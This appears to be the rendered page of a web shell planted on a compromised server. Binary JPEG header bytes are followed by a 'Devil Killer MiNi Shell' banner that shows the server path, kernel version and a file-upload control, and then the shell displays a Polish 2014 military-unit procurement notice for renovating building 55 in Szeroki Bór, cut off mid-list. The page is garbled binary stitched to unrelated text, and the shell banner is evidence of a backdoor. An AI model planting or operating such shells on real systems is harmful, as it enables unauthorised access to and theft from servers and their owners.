JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140812/174001-N-2014.html

<p class="kh_header"><b>Giżycko: ROBOTY BUDOWLANE 
W BUDYNKU NR 55 NA TERENIE JW. 4226 
W SZEROKIM BORZE</b><br>
<b>Numer ogłoszenia: 174001 - 2014; data zamieszczenia: 12.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.24wog.wp.mil.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Obrona Narodowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROBOTY BUDOWLANE 
W BUDYNKU NR 55 NA TERENIE JW. 4226 
W SZEROKIM BORZE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont pomieszczeń, dachu, elewacji oraz wymiana stolarki okiennej i drzwiowej w budynku nr 55 na terenie JW. 4226 
w Szerokim Borze:

Opis budynku  nr  55 -  izba chorych
Budynek został wybudowany w 1951 roku, modernizacja budynku 1987r .Budynek parterowy, niepodpiwniczony, ściany nadziemna murowane, konstrukcja dachu żelbetowa, poszycie dachu - kryty papą asfaltową na lepiku. Stolarka okienna drewniana i 3 szt. PCV. Stolarka drzwiowa drewniana. Obiekt wyposażony 
w instalacje: centralnego ogrzewania, elektryczną, wodno-kanalizacyjną 
i odgromową.  Dojazd do budynków drogą betonowa.

Dane charakterystyczne budynku nr 55: 
- kubatura -  2 751,00 m3,
- powierzchnia użytkowa  - 267,00 m2 
- powierzchnia ogółem - 438,00 m2

Ogólny zakres robót do wykonania (dokładny zakres prac podany jest 
w przedmiarze robót):
1.	Zakres robót do wykonania:
1.1.	Elewacja + roboty zewnętrzne:
1.1.1.	Odbicie tynków zewn. z zaprawy cementowej na ścianach o pow. odbicia do 5 m2 -  146,028 m2;
1.1.2.	Uzupełnienie tynków zewn. cementowych nakrapianych ścianach płaskich( do 1 m2 w 1 miejscu ) -  146,028 m2;
1.1.3.	Dodat. nakłady na pogrub. o 10 mm tynków zewn. cement. na ścianach  
 płaskich, loggiach, balkonach ( do 1 m2 w 1 miejscu ) -  146,028 m2;
1.1.4.	Dwukrotne malowanie farbami emulsyjnymi elewacji - beton	   -  654.67 m2;
1.1.5.	Dwukrotne malowanie farbą olejną krat i balustrad z prętów prostych	  - 29.835 m2;
1.1.6.	Dwukrotne malowanie farbą olejną  powierzchni metal. pełnych - słupki metalowe - 16,96 m2;
1.1.7.	Rusztowania ramowe warszawskie 4 m  -  584.110 m2;
1.1.8.	Rozebranie elementów konstrukcji betonowych o grub. do 15 cm - posadzka wejście do budynku plus 2 podcienie plus opaska betonowa - 11,321 m3 ;
1.1.9.	Zerwanie cokolika  - 21,53 mb;
1.1.10.	Rozebranie chodnika  - 38,378 m2;
1.1.11.	Rozebranie krawężnika betonowego -50,30 mb;
1.1.12.	 Podsypka cement.- piaskowa z zagęszczeniem ręcznym - 3 cm grub. warstwy po zgęszczeniu  - 77,324 m2;
1.1.13.	Podsypka cement.- piaskowa z zagęszczeniem ręcznym - za każdy dalszy 1 cm ; grub. warstwy po zagęszczeniu   - 541,268 m2;
1.1.14.	Chodnik z kostki PLBRUK  - 82,774 m2;
1.1.15.	Obrzeża betonowe - 23,57 mb;
1.1.16.	Krawężnik betonowy  - 66,31 mb;
1.1.17.	Wycieraczki do obuwia typowe 0,27 m2  -  4 szt
1.1.18.	Miski odpływowe pod rury spustowe  - 10 szt.
1.2.	Dach:
1.2.1.	Rozbiórka pokrycia z papy na dachach betonowych - pierwsza warstwa	 - 641.22 m2;
1.2.2.	Rozbiórka pokrycia z papy na dachach betonowych - następna warstwa	 -  641.22 m2;
1.2.3.	Rozbiórka betonowych czapek kominowych -  11.99 m2;
1.2.4.	Uzupełnienie tynków zwykłych cem.-wap. kat. III na kominach ponad dachem płaskim - 22.23 m2;
1.2.5.	Przecieranie tynków zwykłych cem. - wap. kat. II lub III na kominach ponad dachem płaskim - 44.46 m2;
1.2.6.	Dwukrotne malowanie farbami emulsyjnymi elewacji - tynki gładkie - kominy	 - 44.46 m2;
1.2.7.	Nakrywy kominów o śr.gr.7cm  - 11.99 m2;
1.2.8.	Przygotowanie i montaż zbrojenia elem. budynków i budowli - pręty żebrowane - 0.037t;
1.2.9.	Rozebranie rynien z blachy nie nadającej się do użytku	   - 142.50 mb.;
1.2.10.	Rozebranie rur spustowych z blachy nadającej się do użytku	  
- 35.80 mb.
1.2.11.	Rozebranie obróbek blacharskich pas nadrynnowy z blachy nie nadającej się do użytku  -  35.625 m2;
1.2.12.	Rozebranie obróbek blacharskich obróbki kominów z blachy nie nadającej się do użytku  -  12.35 m2;
1.2.13.	Rozebranie obróbek blacharskich kołnierzy z blachy nie nadającej się do użytku -  23.01 m2;
1.2.14.	Rozebranie obróbek blacharskich gzymsów podrynnowych z blachy nie nadającej się do użytku  -  79.09 m2;
1.2.15.	Rozebranie obróbek blacharskich murów ogniowych z blachy nie nadającej się do użytku  -  18.18 m2;
1.2.16.	Izolacja stropów i stropodachów pianką krylaminową grubości 10 cm	  -  542.52 m2;
1.2.17.	Pokrycie dachów papą termozgrzewalną dwuwarstwowe	   
-  	641.20 m2;
1.2.18.	Rynny dachowe półokrągłe o śr.15cm - z blachy ocynkowanej m  
- 142.50 m2;
1.2.19.	Rury spustowe okrągłe o śr.12cm - z blachy ocynkowanej	  
- 	29.60 mb
1.2.20.	Rury spustowe okrągłe o śr.10cm - z blachy ocynkowanej - 6.20 m2;
1.2.21.	Obróbki przy szer. w rozw. do 25cm - z blachy ocynkowanej - pas nadrynnowy, obróbki Kominów -  47.975 m2;
1.2.22.	Obróbki przy szer. w rozw. ponad 25cm - z blachy ocynkowanej - mur ogniowy, kołnierze przy ogniomurze, gzyms podrynnowy -  120.28 m2
1.3.	Instalacja odgromowa:
1.3.1	Demontaż przewodów uziemiających i odgromowych z pręta 
o przekroju do 120 mm2 mocowanych na wspornikach na ścianie 
w ciągu pionowym - 40.00 m
1.3.2	Demontaż przewodów wyrównawczych i odgromowych 
z płaskownika lub pręta mocowanych na dachu  płaskim	 - 316.00  m;
1.3.3	Demontaż złączy rynnowych instalacji odgromowej na dachu płaskim - 10.00  szt.
1.3.4	Demontaż zacisków krzyżowych i uniwersalnych odstępowych instalacji odgromowej na dachu płaskim, złącz kontrolnych	
- 70.00 szt.
1.3.5	Demontaż wsporników instalacji odgromowej ze ściany nie betonowej - 20.00 szt.
1.3.6	Montaż wsporników przelotowych pośredniczących na ścianie 
z cegły ( uchwyt odgromowy do muru) - 20.00 szt.
1.3.7	Montaż zwodów poziomych naprężanych z pręta o śr.8 mm na uprzednio zainstalowanych wspornikach na dachu płaskim	  
-  316.00 m;
1.3.8	Montaż przewodów odprowadzających instalacji odgromowej na budynkach na cegle z wykonaniem otworu mechanicznie - pręt o śr. do 10mm - 40.00 m
1.3.9	Łączenie pręta o śr. do 10mm na dachu za pomocą złączy skręcanych uniwersalnych krzyżowych	- 70.00 szt.
1.3.10	Montaż zwodów pionowych naprężanych z pręta o śr. do 10mm na uprzednio zainstalowanych wspornikach na ścianie - 40.00 m
1.3.11	Montaż złączy do rynny okapowej na dachu, okratowanie okien, kratek wentylacyjnych i pozostałych części metalowych  w instalacji uziemiającej i odgromowej - 10.00 szt.
1.3.12	Montaż złączy kontrolnych z połączeniem drut-płaskownik 
w instalacji uziemiającej i odgromowej - 10.00 szt.
1.3.13	Montaż wsporników naciągowych z jedną złączką przelotowa napręż. na dachu betonowym krytym papą lub blachą	  
-  	15.00 szt.
1.3.14	Montaż wsporników naciągowych z jedną złączką przelotowa napręż. na ścianie z cegły  - 154.00 szt.
1.3.15	Pierwszy pomiar instalacji odgromowej - ciągłość połączeń	 
- 	1.00 pomiar.
1.4.	Wymiana stolarki okiennej i drzwiowej zewnętrznej
1.4.1.	Demontaż kraty okiennej - 9.00 szt.
1.4.2.	  Analogia Montaż kraty - Spawanie prętów okrągłych do kształtowników lub płaskowników   19.709 m spoiny 
1.4.3.	Wymiana okien zespolonych na okna rozwierane i uchylno-rozwierane dwudzielne z PCV o pow. do 2.5 m2 - 19.72 m2 (8 szt. w tym 2 szt. szyba wenecka);
1.4.4.	Wymiana okien zespolonych na okna rozwierane i uchylno-rozwierane dwudzielne z PCV o pow. do 2.0 m2- 33.235 m2  (17 szt. w tym 4 szt. szyba wenecka);
1.4.5.	Wymiana okien zespolonych na okna rozwierane i uchylno-rozwierane jednodzielne z PCV o pow. do 1.0 m2 -   9,393 m2  -- 13 szt.  szyby matowe;
1.4.6.	Montaż drzwi zewnętrznych ocieplanych, PCV z obróbką obsadzenia 
 z 2 szt zamki typu GERDA + samozamykacze,  (z tego 1 szt. drzwi z jednym zamkiem GERDA + drugi zamek jak do domofonu)   - 11.839 m2;
1.4.7.	Obróbki blacharskie z blachy powlekanej o szer. w rozwinięciu ponad 25 cm - parapety zewnętrzne - 14.163 m2
1.5.	 Pomieszczenia biura przepustek
1.5.1.	ANALOGIA - Rozebranie boazerii	  -  36.995 m2;
1.5.2.	Rozebranie posadzki z płytek na zapr. cem - 28,973 m2;
1.5.3.	Zerwanie cokolika -19,52 m2;
1.5.4.	Zerwanie posadzki z tworzyw sztucznych	 -  20.963 m2;
1.5.5.	Odbicie tynków wewn. z zaprawy cementowo-wapiennej na ścianach, filarach, pilastrach o pow. odbicia ponad 5 m2- analogia zbicie glazury
-  	29.40 m2;
1.5.6.	Warstwy wyrównujące i wygładzające z zaprawy samopoziomującej 
gr. 5 mm wykonywane w pomieszczeniach o pow. ponad 8 m2 
-  20.963 m2;
1.5.7.	Warstwy wyrównawcze pod posadzki z zaprawy cementowej gr.20 mm zatarte na gładko  -  28,973 m2;
1.5.8.	Warstwy wyrównawcze pod posadzki z zaprawy cementowej - dodatek lub potrąc.za zmianę grub. o 10mm	 - 	28,973 m2;
1.5.9.	Tynki wewn. zwykłe kat. II wykonyw. ręcznie na podł. z cegły i pustaków cegły i pustaków  na ścianach o pow. podłogi ponad 5 m2 - 29.40 m2;
1.5.10.	Posadzki z płytek o wymiarach 30 x 30 cm, układanych metodą kombinowaną - antypoślizgowa  ( gres) - 49,936 m2;
1.5.11.	Cokolik z płytek   - 19,52 mb.
1.5.12.	Analogia Posadzki - listwy przyścienne z tworzyw sztucznych przykręcane na kołki  rozporowe -  24.14 m
1.5.13.	Licowanie ścian płytkami o wymiarach 30 x 30 cm - na klej - 29.40 m2;
1.5.14.	Przygotowanie powierzchni pod malowanie farbami emulsyjnymi starych tynków z poszpachlow. nierówności - 317.98 m2;
1.5.15.	Dwukrotne malowanie farbami emulsyjnymi starych tynków wewnętrznych sufitów	 - 84.855 m2;
1.5.16.	Dwukrotne malowanie farbami emulsyjnymi starych tynków wewnętrznych ścian 	- 148.293 m2;
1.5.17.	Tynki elewacyjne organiczne na bazie żywicy syntetycznej, wykonywane ręcznie - wykonanie warstwy pośredniej - lamperia  
 -  	118.976 m2;
1.5.18.	Tynki elewacyjne organiczne na bazie żywicy syntetycznej 
z różnobarwnych kamieni o walorach tynku zmywalnego - Sto-Superlit 
o uziarnieniu 1,5 mm, wykonywane ręcznie - lamperia  - 118.976 m2;
1.5.19.	Dwukrotne malowanie farbą olejną rur wodociągowych i gazowych o śr. do 50 mm  - 62,00 m;
1.5.20.	ANALOGIA -- Demontaż i montaż drzwi wraz z ościeżnicą - (drzwi jak do kancelarii tajnej - opis wykonania w SIWZ) - 1,804 m2;
1.5.21.	Wykucie z muru i wstawienie nowych drzwi płytowych - ościeżnice stalowe  - 8,815 m2;
1.5.22.	Montaż drzwi wewnętrznych PCV z obróbką obsadzenia - częściowo przeszklone, 2 szt zamków typu GERDA plus samozamykacze 
-   2.973 m2;
1.5.23.	Wymiana naświetla na okno rozwierane z PCV o pow. do 2.0 m2 -  biuro przepustek, szyba wenecka	   - 1.404 m2;
1.5.24.	Demontaż kraty okiennej -  1szt.;
1.5.25.	Dwukrotne malowanie farbą olejną krat i balustrad z prętów ozdobnych	 - 1.404 m2;
1.5.26.	Montaż kraty - Spawanie prętów okrągłych do kształtowników lub płaskowników  -  1.50 m spoiny;
1.5.27.	Demontaż baterii umywalkowej i natryskowej	   -  2.00 szt.;
1.5.28.	Demontaż rurociągu z PCW o śr. do 50 mm na ścianach budynku	  -  12.50 m2;
1.5.29.	Demontaż grzejnika żeliwnego  -  7 kpl.;
1.5.30.	Demontaż pisuaru - 1,00 kpl.;
1.5.31.	Demontaż umywalki	 - 1,00 kpl.;
1.5.32.	Demontaż ustępu z miską fajansową  - 1,00 kpl.;
1.5.33.	Demontaż rurociągu stalowego ocynkowanego o śr. 15-20 mm 
-  30.00 m;
1.5.34.	Demontaż rurociągu żeliwnego kanalizacyjnego o śr. 50-100 mm - na ścianach budynku  - 4.0m;
1.5.35.	Wpusty polietylenowe podłogowe o śr. zewn. 75-110 mm -  1szt;
1.5.36.	Obsadzenie kratek wentylacyjnych w ścianach z cegieł -  4.00 szt.;
1.5.37.	Baterie umywalkowe ścienne o śr. nom. 15 mm	 - 1,00 szt;
1.5.38.	Baterie wannowe - natrysk ścienne o śr. nom. 15 mm  -  1,00 szt.;
1.5.39.	Dodatkowe nakłady na wykonanie podejść dopływowych do zaworów wypływowych, baterii, hydrantów, mieszaczy itp. o śr. nominalnej 15 mm  -  4,00 szt.;
1.5.40.	Rurociągi z PCW o śr. 110 mm, wewnątrz budynków - z zaworem odpowietrzającym. -  1.00 m;
1.5.41.	Montaż rurociągów z PCW o śr. 32 mm na ścianach z łączeniem metodą wciskową m  - 2.50 m;
1.5.42.	Montaż ustępów pojedynczych z płuczkami z tworzyw sztucznych lub porcelany kompakt -  1 kpl.
1.5.43.	Montaż umywalek pojedynczych porcelanowych z syfonem gruszkowym -1,00szt.
1.5.44.	Dodatek za wykonanie podejść odpływowych z rur i kształtek z nieplastyfikowanego PCW o śr. 50 mm -  2,00 szt.;
1.5.45.	Montaż pisuarów pojedynczych z zaworem spłukującym -  1,00 szt.;
1.5.46.	Rurociągi w instalacji c.o. stalowe o śr, 32 mm o połączeniach spawanych - 46,0 mb.;
1.5.47.	Grzejniki stalowe dwupłytowe  - 7 szt.;
1.5.48.	Zawory grzejnikowe termostatyczne o śr. nominalnej 15 mm	 -7.00 szt.;
1.5.49.	Rury przyłączne o śr. 15 mm do grzejników  - 14 kpl.
1.5.50.	Wymiana przełącznika świecznikowego szeregowego, schodowego lub krzyżowego podtynkowego w puszce ( 7 szt. pojedynczy, 6 szt. podwójny)  -  	13.00 szt.
1.5.51.	Wymiana wyłącznika lub przycisku 1-bieg. podtynkowego w puszce - przycisk dzwonkowy - 4.00 szt.
1.5.52.	Wymiana opraw świetlówkowych z blachy stalowej z kloszem z tworzyw szt. lub rastrem metalowym względnie z tworzyw szt. 2x40 W 
-11.00 szt.;
1.5.53.	Wymiana opraw świetlówkowych z blachy stalowej z kloszem z tworzyw szt. lub rastrem metalowym względnie z tworzyw szt. 1x20 W	 -1,00 szt.;
1.5.54.	Wymiana oprawek do żarówek zwykłych lub półhermetycznych porcelanowych lub metalowych do przykręcania na cegle lub gruzobetonie - plafoniery w łazience z kloszami -   6,00 szt.
1.6.	Pomieszczenia części noclegowej
1.6.1	Rozebranie posadzki z płytek na zapr. cem. - 93,308 m2;
1.6.2	Zerwanie posadzki z tworzyw sztucznych  	-  91.007 m2;
1.6.3	Zerwanie cokolika  -67,15 m2;
1.6.4	Odbicie tynków wewn. z zaprawy cementowo-wapiennej na ścianach, filarach, pilastrach o pow. odbicia ponad 5 m2- analogia zbicie glazury	  -   188.180 m2;
1.6.5	Warstwy wyrównawcze pod posadzki z zaprawy cementowej gr.20 mm zatarte na gładko -184,315 m2;
1.6.6	Warstwy wyrównawcze pod posadzki z zaprawy cementowej - dodatek lub potrąc. za zmianę grub. o 10mm  	-  184,315 m2;
1.6.7	Tynki wewn. zwykłe kat. II wykonyw. ręcznie na podł. z cegły 
i pustaków cegły i pustaków  na ścianach o pow. podłogi ponad 5 m2
-   188.18 m2;
1.6.8	 Posadzki z płytek o wymiarach 30 x 30 cm, układanych metodą kombinowaną - antypoślizgowa        ( gres)   -   184,315 m2;
1.6.9	 Analogia Posadzki - listwy przyścienne z tworzyw sztucznych przykręcane na kołki rozporowe	m  - 98.32 m;
1.6.10	Cokolik z płytek   - 67,15 mb.;
1.6.11	Licowanie ścian płytkami o wymiarach 30 x 30 cm - na klej	 
-   	188.18 m2;
1.6.12	  Przygotowanie powierzchni pod malowanie farbami emulsyjnymi starych tynków z poszpachlow. nierówności -   932.109 	m2;
1.6.13	  Dwukrotne malowanie farbami emulsyjnymi starych tynków wewnętrznych sufitów -  213.071 m2 ;
1.6.14	 Dwukrotne malowanie farbami emulsyjnymi starych tynków wewnętrznych ścian  - 577.963 m2 ;
1.6.15	 Dwukrotne malowanie farbami olejnymi starych tynków wewn. ścian bez szpachlowania -  lamperia pomieszczenia	  -  	32.473 m2 ;
1.6.16	 Tynki elewacyjne organiczne na bazie żywicy syntetycznej, wykonywane ręcznie - wykonanie warstwy pośredniej - lamperia korytarze	 - 107.44 m2
1.6.17	  Tynki elewacyjne organiczne na bazie żywicy syntetycznej 
z różnobarwnych kamieni o walorach tynku zmywalnego - Sto-Superlit 
o uziarnieniu 1,5 mm, wykonywane ręcznie - lamperia  
-   107.44 m2;
1.6.18	Dwukrotne malowanie farbą olejną rur wodociągowych i gazowych o śr. do 50 mm -  161,50 m
1.6.19	Wykucie z muru i wstawienie nowych drzwi płytowych - ościeżnice stalowe  - 44,895 m2
1.6.20	Montaż drzwi wewnętrznych PCV z obróbką obsadzenia - częściowo przeszklone ,  2 szt.  zamków typu GERDA plus samozamykacze.    - 2.05 m2; 
1.6.21	Demontaż baterii umywalkowej i natryskowej    	-  13.00 szt.
1.6.22	Wymiana zlewozmywaka z blachy emaliowanego - 1.00 szt.
1.6.23	Demontaż rurociągu z PCW o śr. do 50 mm na ścianach budynku
-17.00 m;
1.6.24	Demontaż pisuaru - 4.00 kpl.;
1.6.25	Demontaż umywalki	 -   8.00 kpl.
1.6.26	Demontaż ustępu z miską fajansową  -   5.00 kpl.;
1.6.27	Demontaż rurociągu stalowego ocynkownego o śr. 15-20 mm	  
- 	132,00 m;
1.6.28	Demontaż rurociągu żeliwnego kanalizacyjnego o śr. 50-100 mm - na ścianach budynku - 36.00 m
1.6.29	Demontaż grzejnika żeliwnego  -  17 kpl.
1.6.30	Wpusty polietylenowe podłogowe o śr. zewn. 75-110 mm - 9.00szt.
1.6.31	Obsadzenie kratek wentylacyjnych w ścianach z cegieł	  -  24.00szt.
1.6.32	Baterie umywalkowe  ścienne o śr. nom. 15 mm	  - 	9.00 szt.
1.6.33	Baterie wannowe - natrysk ścienne o śr. nom. 15 mm -  4.00 szt.
1.6.34	Dodatkowe nakłady na wykonanie podejść dopływowych do zaworów wypływowych, baterii, hydrantów, mieszaczy itp. o śr. nominalnej 15 mm - 22.00 szt.
1.6.35	Rurociągi z PCW o śr. 110 mm, wewnątrz budynków - z zaworem odpowietrzającym. - 11.00 m
1.6.36	Montaż rurociągów z PCW o śr. 32 mm na ścianach z łączeniem metodą wciskową - 17.0	m
1.6.37	Montaż ustępów pojedynczych z płuczkami z tworzyw sztucznych lub porcelany kompakt -  5.00 kpl.
1.6.38	Montaż umywalek pojedynczych porcelanowych z syfonem gruszkowym - 8.00 szt.
1.6.39	Dodatek za wykonanie podejść odpływowych z rur i kształtek z nieplastyfikowanego PCW o śr. 50 mm   -  	18.00 szt.
1.6.40	Montaż pisuarów pojedynczych z zaworem spłukującym - 4.00 kpl.
1.6.41	Rurociągi w  instalacji c.o. stalowe o śr, 15 mm o połączeniach spawanych - 34,0 mb. 
1.6.42	Rurociągi w  instalacji c.o. stalowe o śr, 20 mm o połączeniach spawanych  - 36,0 mb
1.6.43	Rurociągi w  instalacji c.o. stalowe o śr, 25 mm o połączeniach spawanych - 20,0 mb
1.6.44	Rury przyłączne o śr. 15 mm do grzejników  - 34 kpl.
1.6.45	Grzejniki stalowe dwupłytowe  - 17 szt. 
1.6.46	Zawory odpowietrzające automatyczne o śr. 15 mm - 2,00 szt.
1.6.47	Zawory grzejnikowe termostatyczne o śr. nominalnej 15 mm	  -  17,00 szt.
1.6.48	Wymiana przełącznika świecznikowego szeregowego, schodowego lub krzyżowego podtynkowego w puszce ( 12 szt. pojedynczy, 3 szt.  podwójny) - 15.00 szt.
1.6.49	Wymiana opraw świetlówkowych z blachy stalowej z kloszem z tworzyw szt. lub rastrem metalowym względnie z tworzyw szt. 2x40 W	 - 6.00 szt.  
1.6.50	Wymiana opraw świetlówkowych z blachy stalowej z kloszem z tworzyw szt. lub rastrem metalowym względnie z tworzyw szt. 1x20 W	 -  
41.00 szt. 
1.6.51	Wymiana oprawek do żarówek zwykłych lub półhermetycznych porcelanowych lub metalowych do przykręcania na cegle lub gruzobetonie - plafoniery w łazience z kloszami  2 szt . lampa sufitowa zewnętrzna	- 17.00 szt.
1.6.52	Wymiana podtynkowych gniazd wtyczkowych do 16 A 2 bieg. ze stykiem uziemiającym - pojedyncze - 17 szt., podwójne - 2 szt., hermetyczne pojedyncze - 2 szt -  21.00 szt.
1.6.53	Wymiana  podgrzewacza wody (bojlera ) o poj. 50 dm3 ( nowy bojler dostarcza wykonawca)  - 1 szt.
1.7.	Pomieszczenia części ambulatorium
1.7.1.	Rozebranie posadzki z płytek na zapr. cem.  - 59,799 m2
1.7.2.	Zerwanie posadzki z tworzyw sztucznych  -  53,016 m2
1.7.3.	Zerwanie cokolika  - 31,57 m2
1.7.4.	Odbicie tynków wewn. z zaprawy cementowo-wapiennej na ścianach, filarach, pilastrach o pow. odbicia ponad 5 m2- analogia zbicie glazury -   56,08 m2
1.7.5.	Warstwy wyrównawcze pod posadzki z zaprawy cementowej gr.20 mm zatarte na gładko -112,815 m2
1.7.6.	Warstwy wyrównawcze pod posadzki z zaprawy cementowej - dodatek lub potrąc. za zmianę grub.o 10mm - 112,815 m2;
1.7.7.	 Tynki wewn. zwykłe kat. II wykonyw. ręcznie na podł. z cegły i pustaków cegły i pustaków na ścianach o pow. podłogi ponad 5 m2- 56,08 m2;
1.7.8.	 Posadzki z płytek o wymiarach 30 x 30 cm, układanych metodą kombinowaną - antypoślizgowa ( gres)  - 112,815 m2;
1.7.9.	  Analogia Posadzki - listwy przyścienne z tworzyw sztucznych przykręcane na kołki rozporowe	m -  55,30 m;
1.7.10.	Cokolik z płytek  - 31,57 mb.;
1.7.11.	Licowanie ścian płytkami o wymiarach 30 x 30 cm - na klej	-56,08m2;
1.7.12.	 Przygotowanie powierzchni pod malowanie farbami emulsyjnymi starych tynków z poszpachlow. nierówności	  -  516,434 	m2;
1.7.13.	Dwukrotne malowanie farbami emulsyjnymi starych tynków wewnętrznych sufitów -  153,953 m2  
1.7.14.	Dwukrotne malowanie farbami emulsyjnymi starych tynków wewnętrznych ścian  - 	362,481 m2 
1.7.15.	 Dwukrotne malowanie farbami olejnymi starych tynków wewn. ścian bez szpachlowania -  lamperia pomieszczenia -  26,144 m2 
